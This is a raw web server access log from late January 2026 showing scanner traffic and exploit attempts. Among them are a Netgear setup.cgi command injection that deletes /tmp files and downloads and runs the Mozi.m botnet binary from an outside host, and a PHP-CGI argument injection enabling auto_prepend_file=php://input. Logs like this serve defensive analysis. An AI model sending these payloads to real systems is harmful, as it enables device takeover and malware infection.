15.204.155.25 - - [29/Jan/2026:01:27:31 -0500] "GET /wp-content/plugins/hdinvoice3/readme.txt HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
15.204.155.25 - - [29/Jan/2026:01:27:31 -0500] "GET /wp-content/cache/assets/24.csv HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
110.37.103.213 - - [29/Jan/2026:01:29:05 -0500] "POST /GponForm/diag_Form?images/ HTTP/1.1" 302 266 "-" "Hello, World"
18.192.46.15 - - [29/Jan/2026:01:42:31 -0500] "GET / HTTP/1.1" 302 390 "-" "Go-http-client/1.1"
193.142.147.209 - - [29/Jan/2026:02:24:02 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
204.76.203.69 - - [29/Jan/2026:02:24:40 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.146.230 - - [29/Jan/2026:02:35:15 -0500] "GET /login HTTP/1.1" 302 270 "-" "Go-http-client/1.1"
103.236.95.173 - - [29/Jan/2026:02:45:35 -0500] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 270 "-" "libredtail-http"
91.202.233.79 - - [29/Jan/2026:02:55:47 -0500] "GET /.git/config HTTP/1.1" 302 270 "-" "-"
85.217.149.11 - - [29/Jan/2026:03:13:59 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)"
52.35.140.105 - - [29/Jan/2026:03:16:26 -0500] "GET / HTTP/1.1" 302 390 "-" "Go-http-client/1.1"
45.230.66.110 - - [29/Jan/2026:03:23:59 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.110:10784/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1" 302 274 "-" "-"
106.75.2.51 - - [29/Jan/2026:03:25:27 -0500] "GET /version HTTP/1.1" 302 270 "-" "-"
106.75.2.51 - - [29/Jan/2026:03:25:27 -0500] "GET / HTTP/1.1" 302 390 "-" "-"
106.75.2.51 - - [29/Jan/2026:03:25:28 -0500] "GET / HTTP/1.1" 302 390 "-" "-"
106.75.2.51 - - [29/Jan/2026:03:25:29 -0500] "GET /v1 HTTP/1.1" 302 270 "-" "-"
106.75.2.51 - - [29/Jan/2026:03:25:29 -0500] "GET / HTTP/1.1" 302 390 "-" "-"
27.115.124.112 - - [29/Jan/2026:03:33:14 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
117.215.51.112 - - [29/Jan/2026:03:33:15 -0500] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.1" 302 274 "-" "-"
27.115.124.69 - - [29/Jan/2026:03:33:30 -0500] "GET /robots.txt HTTP/1.1" 302 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
64.62.197.92 - - [29/Jan/2026:03:38:19 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
64.62.197.92 - - [29/Jan/2026:03:39:33 -0500] "GET /webui/ HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/135.0.0.0 Safari/537.36"
118.194.252.40 - - [29/Jan/2026:03:39:49 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
64.62.197.103 - - [29/Jan/2026:03:40:09 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/135.0.0.0 Safari/537.36"
64.62.197.92 - - [29/Jan/2026:03:41:48 -0500] "GET /geoserver/web/ HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"